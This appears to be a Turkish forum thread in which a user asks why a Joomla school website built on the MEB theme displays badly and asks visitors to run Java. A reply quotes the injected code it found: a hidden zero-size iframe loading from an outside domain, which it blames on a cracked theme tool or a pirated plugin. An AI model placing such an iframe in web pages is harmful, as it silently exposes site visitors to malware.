Joomla Meb Teması Okul Sitesi Yardım

Kodla Büyü

saimserin

Seçkin Üye
Seçkin Üye
Arkadaşlar MEB'in kullandığı temayı kullanarak joomla 2.5 te okuluma site yaptım.İlk bir kaç gün içerisinde firefox ve internet explorerde izlerken problem yok sonra ne oluyorsa internet explorerda her şey birbirine girmiş olarak görünüyor.Bu konuda acil yardımlarınızı bekliyorum.Teşekkürler...

saimserin' Alıntı:
Arkadaşlar acaba uyumsuzluk problemi mi var?
diğer tarayıcılarda da sorun var açılışta java çalıştırmamızı istiyor. temanın içinde javascript kodları var, normalde joomlada olmayan bir durum bu. Siz bir java uygulaması kurmadığınız halde bu hatayı verirse temadan kaynaklı olduğunu düşünüyorum.
denemek için farklı bir tema kurun ve temayı etkinleştirin o hatayı vermeyecektir.temayı indirdiğiniz yerden destek isteyin bence

sitenizin içindeki virüsü buldum sanırım
Kod:
<iframe src="http://eqteizzprpwtzdew.info/in.cgi?14" style="width: 0px; height: 0px; visibility: hidden; "></iframe>
Bu virüs tema yapma programı artister in cra-cklı kullanılmasından sonra ortaya çıkan bir virüs diye biliyorum, eğer artister i satın almadan kullanıyorsanız yaptığınız her temanın içine virüs atıyor.
tabiiki kesin emin değilim. sizin wa-rez bir eklenti kullanmanızdan veya serverinizden de bulaşmış olabilir.

Geri